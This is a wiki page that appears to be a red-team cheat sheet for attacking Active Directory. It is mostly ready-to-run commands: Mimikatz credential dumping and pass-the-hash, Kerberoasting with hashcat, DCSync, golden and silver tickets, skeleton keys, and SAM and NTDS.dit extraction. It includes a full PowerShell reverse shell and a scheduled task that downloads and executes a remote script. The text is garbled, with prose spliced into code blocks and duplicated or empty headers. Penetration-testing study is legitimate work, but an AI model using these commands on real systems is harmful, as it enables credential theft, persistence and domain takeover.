<syntaxhighlight lang="powershell">
# Start up Neo4j First
 
sudo neo4j start
 
# Start Bloodhound Server
 
Bloodhound
 
# Bloodhound Ingestors
 
# .Net from SharpsCollection 4.7_Any
.\SharpHound.exe -c All
 
Import-Module .\SharpHound.ps1
# Actual session
Invoke-BloodHound -CollectionMethod All -Verbose
# Actual session with more options
Invoke-Bloodhound -Verbose -Domain 'domain.local' -DomainController '172.16.0.1' -CollectionMethod all
# With Credential
Invoke-Bloodhound -Verbose -Domain 'domain.local' -DomainController 'DC01.domain.local' -LDAPUser 'targetuser' -LDAPPass 'targetpass' -CollectionMethod  all
 
# transfert your ZIP
</syntaxhighlight>
 
== Lateral Movement ==
<syntaxhighlight lang="powershell">
# Powershell Remoting
 
# Execute commands or scriptblocks
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
 
# Execute scripts from files
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
 
# Execute locally loaded function on the remote machines
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList
 
# A function call within the script is used
Invoke-Command -Filepath C:\path\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)


You have an SPN service/user the attack works because by default any domain user can request a Ticket to these user's/services the Kerberos grant's a ticket, this ticket is later stored in memory and you can grab this ticket, save it offline and crack the hash file to gain clear-text credentials.
# "Stateful" commands using Invoke-Command
$Sess = New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}


Tim Medin presented at DerbyCon 2014 a tool called Kerberoast which cracks Kerberoast TGS tickets, He determined that possession of a TGS service ticket encrypted with the RC4 provides the opportunity to take the ticket to a password-cracking computer (or cloud system) and an attempt to crack the service account's password. How does this work? Since the TGS Kerberos ticket is encrypted with RC4 encryption, that means the service account's password hash is used to encrypt the ticket. The cracking system loops through converts to NTLM, and attempts to open the TGS ticket. If the TGS ticket is opened, we know the clear text password and the NTLM password for the account.
# Dump credentials on a local machine
Invoke-Mimikatz -DumpCreds


In Summary
# Dump credentials on multiple remote machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")


Kerberoasting abuses traits of the Kerberos protocol to harvest password hashes for Active Directory user accounts with serviceprincipalName (SPN) values (i.e. service accounts). A user is allowed to request a ticket-granting service (TGS) ticket for any SPN, and parts of the TGS may be encrypted with the RC4 using the password hash of the service account assigned the requested SPN as the key.
# Over pass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:lab.domain.local /ntlm:<ntlmhash> /run:powershell.exe"'


An adversary who can extract the TGS ticket from memory, or capture them by sniffing network traffic, can extract the service account's password hash and attempt an offline brute force attack to obtain the plaintext password.
# Invoke Mimikatz to create a token from user
$sess = New-PSSession -ComputerName target.domain.local
Enter-PSSession $sess
# EP BYPASS + AMSI BYPASS
exit
# PUSH LOCAL SCRIPT TO SESSION
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
# DUMPING
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
</syntaxhighlight>


Now will use a few methods to search for any Kerberoastable Users. This can be done with any domain user this attack is abused since any domain user can request a ticket for an SPN account we verify our domain account
== Port Forwarding ==
<syntaxhighlight lang="powershell">
# RULE
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=10.10.10.10 connectport=8080
# CHECK
netsh interface portproxy show all
# RESET
netsh interface portproxy reset
</syntaxhighlight>


<screenshot>
== Kerberos Double Hops ==
<syntaxhighlight lang="powershell">
# LOGIN WITH COMPROMISED ACCOUNT
Invoke-Mimikatz -Command '"sekurlsa::pth /user:bob /domain:DOMAIN.LOCAL /ntlm:00000000000000000000000000000000 /run:powershell.exe"'


I will use Rubeus to locate Kerberoastable user's an OPSEC tactic to consider is using the /stats parameter this will only search for Kerberoastable Users on the current domain without requesting a Ticket to the DC.
# PSREMOTE TO SERVER A
$servera = New-PSSession -ComputerName SERVERA.DOMAIN.LOCAL
Enter-PSSession -Session $servera


<code>Rubeus kerberoast /stats</code>
# PASS CREDENTIAL TO SERVER B
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\alice', $SecPassword)
$serverb = New-PSSession -ComputerName SERVERB.DOMAIN.LOCAL -Credential $Cred


<screenshot>
# LIST TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' klist} -Session $serverb | Select-String -Pattern Username


We can Enumerate the specific users of the Domain that are available for Kerberoast, the following command will enumerate users with a Service Principal Name.
# DUMP TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' dump /user:targetadmin} -Session $serverb


<code>SharpView.exe Get-DomainUser -SPN</code>
# INJECT TICKET IN SERVER B:
Invoke-Command -ScriptBlock {& '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe'  ptt /ticket:B64 } -Session $serverb


<screenshot>
# CHECK INJECTION:
Invoke-Command -ScriptBlock { ls \\serverc\c$ } -Session $serverb


Now we can request the ticket from the users and choose the format-specific for our cracking tool which this preference would be hashcat
# RCE ON SERVER C:
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {hostname} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb


<code>Rubeus kerberoast /domain:DominionCyber.local /user:jnovoa /nowrap</code>
# FINAL REVERSE SHELL IN SERVER A FROM SERVER C
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {$client = New-Object System.Net.Sockets.TCPClient("servera",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb
</syntaxhighlight>


<screenshot>
=='''Kerberoasting'''==
<syntaxhighlight lang="powershell">
.\Rubeus.exe kerberoast /stats
.\Rubeus kerberoast /domain:DominionCyber.local /user:jnovoa /nowrap
.\SharpView.exe Get-DomainUser -SPN


Now with this available, we can crack the password offline utilizing hashcat, once sent to our cracking rig we can use wordlists to attack this hash and try cracking it with this one we managed to get the password by utilizing the RockYou wordlist with a ruleset.
# Crack SPN's with Hashcat
hashcat.exe -m 13100 -a 0 hashes wordlist


<code>hashcat.exe -m 13100 -a 0 hashes wordlist</code>
</syntaxhighlight>


<screenshot>
</onlyinclude>
=='''Unconstrained Delegation'''==
=='''Unconstrained Delegation'''==
=='''Constrained Delegation'''==
=='''Constrained Delegation'''==
=='''DCSync'''==
=='''DCSync'''==
<syntaxhighlight lang="powershell">
# DCSync feature for getting krbtgt hash
# Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
# Mimikatz Dump Account
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername DC01
</syntaxhighlight>
=='''Golden Tickets'''==
=='''Golden Tickets'''==
<syntaxhighlight lang="powershell">
# Golden ticket with Mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:lab.domain.local /sid:S-1-5-x-x-x-x /krbtgt:00000000000000000000000000000000 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
# Golden Ticket with Rubeus
Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
</syntaxhighlight>Golden Ticket Parameters
{| class="wikitable"
|+
!Invoke-Mimikatz -Command
!Explanation
|-
|kerberos::golden
|Name of the module
|-
|/User:Administrator
|Username of the user you want to impersonate
|-
|/domain:lab.domain.local
|Current Domain FQDN
|-
|/sid:S-1-5-x-x-x-x
|Current Domain SID
|-
|/krbtgt:00000000000000000000000000000000
|RC4 of the current domain KRBTGT
|-
|/id:500 /groups:512
|Optional User RID (default 500) and Group default 513 512 520 518 519)
|-
|/ptt or /ticket
|/ptt injects the ticket into the current process, /ticket saves the ticket for to a file for later
|-
|/startoffset:0
|Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future
|-
|/endin:600
|Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes
|-
|/renewmax:10080
|Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800
|}
=='''Silver Tickets'''==
=='''Silver Tickets'''==
<syntaxhighlight lang="powershell">
# Silver Ticket with Rubeus
Rubeus.exe silver /service:cifs/dc-local.domain.com /aes256:c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7 /user:nlamb /domain:domain.com /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
Invoke-Mimikatz -Command '"kerberos::golden /domain:lab.domain.local /sid:S-1-5-x-x-x-x /target:DC01.lab.domain.local /service:CIFS /rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
# Generate Silver ticket with machine account Hash - WMI abuse
Invoke-Mimikatz -Command '"kerberos::golden /domain:target.local /sid:S-1-5-x-x-x-x /target:machine.target.local /service:HOST/rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:target.local /sid:S-1-5-x-x-x-x /target:machine.target.local /service:RPCSS/rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
# Check WMI
Get-WmiObject -Class win32_operatingsystem -ComputerName machine.target.local
## Using a silver ticket for persistence
# Create a silver ticket for the HOST SPN which will allow us to schedule a task
Invoke-Mimikatz -Command '"kerberos::golden /domain:lab.domain.local /sid:S-1-5-x-x-x-x /target:DC01.lab.dmoain.local /service:HOST /rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
# CONFIGURE REMOTE TASK
schtasks /create /S DC01.lab.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Abuse01" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.10/Invoke-PowerShellTcp.ps1''')'"
# EXEC REMOTE TASK
schtasks /Run /S DC01.lab.domain.local /TN "Abuse01"
</syntaxhighlight>
{| class="wikitable"
|+
!Invoke-Mimikatz -Command
!Explanation
|-
!kerberos::golden
!Name of the module (there is no Silver module!)
|-
!/User:Administrator
!Username for which the TGT is generated
|-
!/domain:lab.domain.local
!Domain FQDN
|-
!/sid:S-1-5-x-x-x-x
!SID of the domain
|-
!/target:DC01.lab.domain.local
!Target server FQDN
|-
!/service:cifs
!The SPN name of service for which TGS is to be created
|-
!/rc4:00000000000000000000000000000000
!NTLM (RC4) hash of the service account. Use /aes128 and /aes256 for using AES keys
|-
!/id:500 /groups:512
!Optional User RID (default 500) and Group (default 513 512 520 518 519)
|-
!/ptt
!Injects the ticket in current PowerShell process - no need to save the ticket on disk
|-
!/startoffset:0
!Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future
|-
|/endin:600
|Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes
|-
|/renewmax:10080
|Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800
|}
=='''Skeleton Keys'''==
=='''Skeleton Keys'''==
<syntaxhighlight lang="powershell">
# REMOTE
$sess = New-PSSession DC01.domain.local
Enter-PSSession -Session $sess
# BYPASS AMSI AND EXIT
Invoke-Command -FilePath C:\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
# OR
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC01.lab.dmoain.local
# LOGIN
Enter-PSSession -Computername DC01 -credential domain\Administrator
# PASSWORD mimikatz
## Skeleton Key with lsass running as a protected process
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
#! needs the mimikatz driver (mimidriv.sys) on disk of the target DC !#
</syntaxhighlight>
=='''ADCS'''==
=='''ADCS'''==
=='''NTLMRelay'''==
=='''NTLMRelay'''==
=='''AS-REPRoasting'''==
=='''AS-REPRoasting'''==
== References ==
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet/tree/master/G%20-%20Lateral%20Movement

Latest revision as of 12:01, 19 September 2023

Initial Access

Impacket

impacket-smbpasswd
#impacket-smbpasswd / Change password for vulnerable users.
smbpasswd.py j.doe@192.168.1.11
smbpasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971889
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' -altuser administrator -altpass 'Adm1nPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!' -admin
smbpasswd.py SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502da14a98b58f2c319b81b3a49cb -altuser CONTOSO/SrvAdm -althash 6fe945ead39a7a6a2091001d98a913ab
impacket-rpcdump
# when port 135 or 539 is open.
135/tcp   open     msrpc         Microsoft Windows RPC

impacket-rpcdump -p 135 10.10.206.21


LOLBAS

Remote Code Execution

#WMI
Wmic /node:COMPUTER/user:DOMAIN\USER /password:PASSWORD process call create COMMAND

#PowerShell (WMI)
Invoke-WMIMethod -Class Win32_Process -Name Create ArgumentList $COMMAND ComputerName $COMPUTER -Credential $CRED

#WinRM
winrs r:COMPUTER COMMAND

#PowerShell Remoting
Invoke-Command computername $COMPUTER -command { $COMMAND}
New-PSSession -Name PSCOMPUTER ComputerName $COMPUTER; Enter-PSSession -Name PSCOMPUTER

Runas

#Run notepad.exe as the user Jdoe on domain SS64dom with no profile:
C:\> Runas /noprofile /user:SS64Dom\jDoe "notepad.exe"

#Run CMD.exe as the Administrator on the local machine Dellpc64:
C:\> Runas /profile /user:DELLPC64\administrator CMD

#Run Notepad.exe as 'Natasha' on domain SS64dom using the current environment, and open a file, escape the quote characters around the filename with \ :
C:\> Runas /profile /env /user:SS64Dom\natasha "notepad \"C:\work\demo file.txt\""

#Run Active Directory Users and Computers (dsa.msc) as the user Jdoe on domain SS64dom:
C:\> Runas /env /user:SS64Dom\jDoe "START %windir%\system32\dsa.msc"
<section end="runas" />

References:

Runas

AD-Module

Import-Module .\Microsoft.ActiveDirectory.Management.dll

PowerShell LocalAccounts Module

Get-Command -Module Microsoft.PowerShell.LocalAccounts
The list below briefly describes what each of these cmdlets is used for:
Add-LocalGroupMember           # Add a user to the local group
Disable-LocalUser              # Disable a local user account
Enable-LocalUser               # Enable a local user account
Get-LocalGroup                 # View local group preferences
Get-LocalGroupMember           # View the list of all local group members
Get-LocalUser                  # View local user account preferences
New-LocalGroup                 # Create a new local group
New-LocalUser                  # Create a new local user account
Remove-LocalGroup              # Remove a local group
Remove-LocalGroupMember        # Remove a member from a local group
Remove-LocalUser               # Remove local user account
Rename-LocalGroup              # Rename a local group
Rename-LocalUser               # Rename a local user account
Set-LocalGroup                 # Change the settings of a local group
Set-LocalUser                  # Change the account settings of a local user

Example:

Add-LocalGroupMember -Group "Administrators" -Member "Username"

PowerView

# Load PowerView on Disk 
./PowerView.ps1

# Import PowerView
. .\PowerView.ps1 # dot sourcing
IPMO .\PowerView.ps1 # short cut for Import-Module
Import-Module .\PowerView.ps1 # Import-Module

# Load PowerView
Import-Module PowerView

# Load PowerView with Cobalt Strike 
powershell-import /home/user/directory/of/PowerView.ps1

# Check if PowerView has been loaded Successfully
Get-InstalledModule

General PowerView Functions

Export-PowerViewCSV             #  thread-safe CSV append
Set-MacAttribute                #  Sets MAC attributes for a file based on another file or input (from Powersploit)
Copy-ClonedFile                 #  copies a local file to a remote location, matching MAC properties
Get-IPAddress                   #  resolves a hostname to an IP
Test-Server                     #  tests connectivity to a specified server
Convert-NameToSid               #  converts a given user/group name to a security identifier (SID)
Convert-SidToName               #  converts a security identifier (SID) to a group/user name
Convert-NT4toCanonical          #  converts a user/group NT4 name (i.e. dev/john) to canonical format
Get-Proxy                       #  enumerates local proxy settings
Get-PathAcl                     #  get the ACLs for a local/remote file path with optional group recursion
Get-UserProperty                #  returns all properties specified for users, or a set of user:prop names
Get-ComputerProperty            #  returns all properties specified for computers, or a set of computer:prop names
Find-InterestingFile            #  search a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess    #  check if the current user context has local administrator access to a specified host
Get-DomainSearcher              #  builds a proper ADSI searcher object for a given domain
Get-ObjectAcl                   #  returns the ACLs associated with a specific active directory object
Add-ObjectAcl                   #  adds an ACL to a specified active directory object
Get-LastLoggedOn                #  return the last logged on user for a target host
Get-CachedRDPConnection         #  queries all saved RDP connection entries on a target host
Invoke-ACLScanner               #  enumerate -1000+ modifable ACLs on a specified domain
Get-GUIDMap                     #  returns a hash table of current GUIDs -> display names
Get-DomainSID                   #  return the SID for the specified domain
Invoke-ThreadedFunction         #  helper that wraps threaded invocation for other functions

Net Functions

Get-NetDomain                   #  gets the name of the current user's domain
Get-NetForest                   #  gets the forest associated with the current user's domain
Get-NetForestDomain             #  gets all domains for the current forest
Get-NetDomainController         #  gets the domain controllers for the current computer's domain
Get-NetUser                     #  returns all user objects, or the user specified (wildcard specifiable)
Add-NetUser                     #  adds a local or domain user
Get-NetComputer                 #  gets a list of all current servers in the domain
Get-NetPrinter                  #  gets an array of all current computers objects in a domain
Get-NetOU                       #  gets data for domain organization units
Get-NetSite                     #  gets current sites in a domain
Get-NetSubnet                   #  gets registered subnets for a domain
Get-NetGroup                    #  gets a list of all current groups in a domain
Get-NetGroupMember              #  gets a list of all current users in a specified domain group
Get-NetLocalGroup               #  gets the members of a localgroup on a remote host or hosts
Add-NetGroupUser                #  adds a local or domain user to a local or domain group
Get-NetFileServer               #  get a list of file servers used by current domain users
Get-DFSshare                    #  gets a list of all distribute file system shares on a domain
Get-NetShare                    #  gets share information for a specified server
Get-NetLoggedon                 #  gets users actively logged onto a specified server
Get-NetSession                  #  gets active sessions on a specified server
Get-NetRDPSession               #  gets active RDP sessions for a specified server (like qwinsta)
Get-NetProcess                  #  gets the remote processes and owners on a remote server
Get-UserEvent                   #  returns logon or TGT events from the event log for a specified host
Get-ADObject                    #  takes a domain SID and returns the user, group, or computer object associated with it
Set-ADObject                    #  takes a SID, name, or SamAccountName to query for a specified  domain object, and then sets a pecified 'PropertyName' to a specified 'PropertyValue'

GPO functions

Get-GptTmpl                     #  parses a GptTmpl.inf to a custom object
Get-NetGPO                      #  gets all current GPOs for a given domain
Get-NetGPOGroup                 #  gets all GPOs in a domain that set "Restricted Groups" on on target machines
Find-GPOLocation                #  takes a user/group and makes machines they have effectiverights over through GPO enumeration and correlation
Find-GPOComputerAdmin           #  takes a computer and determines who has admin rights over itthrough GPO enumeration
Get-DomainPolicy                #  returns the default domain or DC policy

User-Hunting Functions

Invoke-UserHunter               #  finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-StealthUserHunter        #  finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
Invoke-ProcessHunter            #  hunts for processes with a specific name or owned by a specific user on domain machines
Invoke-UserEventHunter          #  hunts for user logon events in domain controller event logs

Domain Trust Functions

Get-NetDomainTrust              #  gets all trusts for the current user's domain
Get-NetForestTrust              #  gets all trusts for the forest associated with the current user's domain
Find-ForeignUser                #  enumerates users who are in groups outside of their principal domain
Find-ForeignGroup               #  enumerates all the members of a domain's groups and finds users that are outside of the queried domain
Invoke-MapDomainTrust           #  try to build a relational mapping of all domain trusts

Meta Functions

Invoke-ShareFinder              #  finds (non-standard) shares on hosts in the local domain
Invoke-FileFinder               #  finds potentially sensitive files on hosts in the local domain
Find-LocalAdminAccess           #  finds machines on the domain that the current user has local admin access to
Find-ManagedSecurityGroups      #  searches for active directory security groups which are managed and identify users who have write access to
                                #  those groups (i.e. the ability to add or remove members)
Find-UserField                  #  searches a user field for a particular term
Find-ComputerField              #  searches a computer field for a particular term
Get-ExploitableSystem           #  finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin      #  enumerates members of the local Administrators groups across all machines in the domain

Domain Enumeration

Domain
# Get current domain

Get-NetDomain (PowerView)                                  
Get-ADDomain (ActiveDirectory Module)                      

# Get Object of another domain

Get-NetDomain -Domain domain.local                         
Get-ADDomain -Identity domain.local                         

# Get domain SID for the current domain

Get-DomainSID                                              
(Get-ADDomain).DomainSID                                   

# Get domain policy for the current domain

Get-DomainPolicy                                           
(Get-DomainPolicy)."system access"                         

# Get domain policy for another domain

(Get-DomainPolicy -domain domain.local)."system access"     

# Get domain controllers for the current domain

Get-NetDomainController                                   
Get-ADDomainController                                     

# Get domain controllers for another domain

Get-NetDomainController -Domain domain.local                
Get-ADDomainController -DomainName domain.local -Discover
Net User
# Get a list of users in the current domain

Get-NetUser                                                
Get-NetUser -Username student1                              
Get-NetUser | select -ExpandProperty samaccountname         
Get-ADUser -Filter * -Properties *                          
Get-ADUser -Identity student1 -Properties *                

# Get list of all properties for users in the current domain

Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}

# Search for a particular string in a user's attributes

Find-UserField -SearchField Description -SearchTerm "built"
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
Net Group
# Get a list of computers in the current domain

Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
Get-ADComputer -Filter * | select Name Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADComputer -Filter * -Properties *

# Get all the groups in the current domain

Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter * -Properties *

# Get all groups containing the word "admin" in group name

Get-NetGroup *admin*
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name

# Get all the members of the Domain Admins group

Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain target.local

# Get the group membership for a user

Get-NetGroup -UserName "john"
Get-ADPrincipalGroupMembership -Identity student1

# List all the local groups on a machine (needs administrator privs on non-dc machines)

Get-NetLocalGroup -ComputerName DC01.enumme.local -ListGroups

# Get members of all the local groups on a machine (needs administrator privs on non-dc machines)

Get-NetLocalGroup -ComputerName DC01.enumme.local -Recurse
Logged Sessions / Users
# Get actively logged users on a computer (needs local admin rights on the target)

Get-NetLoggedon -ComputerName <servername>

# Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)

Get-LoggedonLocal -ComputerName DC01.enumme.local

# Get the last logged user on a computer (needs administrative rights and remote registry on the target)

Get-LastLoggedOn -ComputerName <servername>
Shares
# Find shares on hosts in current domain

Invoke-ShareFinder -Verbose
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose

# Find sensitive files on computers in the domain

Invoke-FileFinder -Verbose

# Get all fileservers of the domain

Get-NetFileServer
GPO
# Get list of GPO in current domain

Get-NetGPO
Get-NetGPO -ComputerName DC01.enumme.local
Get-GPO -All (GroupPolicy module)
Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html (Provides RSoP)

# Enumerate ACLs for all the GPOs

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

# Enumerate Restricted Groups from GPO

Get-NetGPOGroup -Verbose

# Enumerate GPOs where target user or group have interesting permissions

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ?{$_.IdentityReference -match "target"}

# Membership of the Group "RDPUsers”

Get-NetGroupMember -GroupName RDPUsers

# Get GPO(s) which use Restricted Groups or groups.xml for interesting users

Get-NetGPOGroup

# Get users which are in a local group of a machine using GPO

Find-GPOComputerAdmin -Computername srv.enumme.local

# Get machines where the given user is member of a specific group

Find-GPOLocation -UserName john -Verbose

# GPO applied on the target OU

(Get-NetOU targetmachine -FullData).gplink[LDAP://cn={x-x-x-x-x},cn=policies,cn=system,DC=target,DC=domain,DC=local;0]
Get-NetGPO -ADSpath 'LDAP://cn={x-x-x-x-x},cn=policies,cn=system,DC=target,DC=domain,DC=local'
OU
# Get OUs in a domain

Get-NetOU -FullData
Get-ADOrganizationalUnit -Filter * -Properties *

# Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU

Get-NetGPO -GPOname "{x-x-x-x-x}"
Get-GPO -Guid x-x-x-x-x (GroupPolicy module)

# List all the computers in the target OU

Get-NetOU targetcomputer | %{Get-NetComputer -ADSPath $_}
ACL
# Get the ACLs associated with the specified object

Get-ObjectAcl -SamAccountName john -ResolveGUIDs
Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs -Verbose
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs -Verbose

# Get the ACLs associated with the specified prefix to be used for search

Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose

# We can also enumerate ACLs using ActiveDirectory module but without resolving GUIDs

(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=domain,DC=local').Access

# Get the ACLs associated with the specified LDAP path to be used for search

Get-ObjectAcl -ADSpath "LDAP://CN=Domain
Admins,CN=Users,DC=domain,DC=local" -ResolveGUIDs -Verbose

# Search for interesting ACEs

Invoke-ACLScanner -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "target"}
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "targetgroup"}

# Get the ACLs associated with the specified path

Get-PathAcl -Path "\\DC01.domain.local\sysvol"
Domain Trusts
# Get a list of all domain trusts for the current domain

Get-NetDomainTrust
Get-NetForestDomain -Verbose
Get-NetDomainTrust -Domain fr.k71.test.local
Get-ADTrust
Get-ADTrust -Identity fr.k71.test.local

# Get details about the current forest

Get-NetForest
Get-NetForest -Forest domain.local
Get-ADForest
Get-ADForest -Identity domain.local

# Get all domains in the current forest

Get-NetForestDomain
Get-NetForestDomain -Forest domain.local
(Get-ADForest).Domains

# Map all the trusts of the domain.local forest

Get-NetForestDomain -Verbose | Get-NetDomainTrust

# Get all global catalogs for the current forest

Get-NetForestCatalog
Get-NetForestCatalog -Forest domain.local
Get-ADForest | select -ExpandProperty GlobalCatalogs

# Map trusts of a forest

Get-NetForestTrust
Get-NetForestTrust -Forest domain.local
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

# List external trusts

Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'}

Privileges

SeBackupPrivilege

Method 1
# On the victim machine.
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

# From the victim machine to the attack machine.
Download sam
Download system

# On the attack machine.
pypykatz registry --sam sam system
Method 2
# On the attack machine.
nano rcats.dsh
set context persistent nowriters
add volume c: alias rcats
create
expose %rcats% z:

# On the attack machine.
unix2dos rcats.dsh

# On the vicitm machine.
cd C:\Temp
upload rcats.dsh
diskshadow /s rcats.dsh
robocopy /b z:\windows\ntds . ntds.dit

reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system

# On the attack machine.
impacket-secretsdump -ntds ntds.dit -system system local
Method 3
# On the vicitm machine.
cd C:\Temp
upload rcats.dsh #create this the same way as method 2 above.
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
diskshadow /s rcats.dsh

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system

# On the attacker machine.
impacket-secretsdump -ntds ntds.dit -system system local

Privilege Escalation

Basic Privilege escalation - PowerUp.ps1
1. Service Enumeration
Get-ServiceUnquoted                 #   returns services with unquoted paths that also have a space in the name
Get-ModifiableServiceFile           #   returns services where the current user can write to the service binary path or its config
Get-ModifiableService               #   returns services the current user can modify
Get-ServiceDetail                   #   returns detailed information about a specified service

2. Service Abuse
Invoke-ServiceAbuse                 #   modifies a vulnerable service to create a local admin or execute a custom command
Write-ServiceBinary                 #   writes out a patched C # service binary that adds a local admin or executes a custom command
Install-ServiceBinary               #   replaces a service binary with one that adds a local admin or executes a custom command
Restore-ServiceBinary               #   restores a replaced service binary with the original executable

3. DLL Hijacking
Find-ProcessDLLHijack               #   finds potential DLL hijacking opportunities for currently running processes
